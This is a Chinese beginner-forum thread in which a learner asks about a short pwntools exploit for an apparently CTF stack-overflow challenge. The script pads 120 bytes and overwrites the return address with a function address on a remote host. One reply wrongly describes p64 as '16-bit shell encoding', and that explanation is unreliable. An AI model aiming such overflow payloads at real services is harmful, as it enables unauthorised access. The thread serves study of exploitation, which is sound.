求教一题简单的栈溢出payload分析

显示全部楼层 · 2019-7-30 14:54:05

from pwn import *
p=remote('129.211.58.26',10000)
p.recvuntil('Plz input letter exactly!\n')
payload='a'*(120)+p64(0x4006B6)
p.sendline(payload)
p.interactive()
加粗字体部分的 'a'*(120)是什么意思。。
然后题目放在附件里了希望有师傅可以教一下orz

guo · 2019-8-10 23:07:11

因为变量V4与返回地址之间相差0x70h,之间要填充120个字符。

Arashialing · 2019-8-13 14:19:35

guo 发表于 2019-8-10 23:07
因为变量V4与返回地址之间相差0x70h,之间要填充120个字符。

请问一下这个地址相差怎么看呢

shaxin · 2019-8-21 16:24:56

120是栈内gets开始到ret的偏移，p64是16位的shell编码，0x4006B6是foo函数起始地址

Arashialing · 2019-9-5 20:32:48

shaxin 发表于 2019-8-21 16:24
120是栈内gets开始到ret的偏移，p64是16位的shell编码，0x4006B6是foo函数起始地址

蟹蟹师傅

[新手入门] 求教一题简单的栈溢出payload分析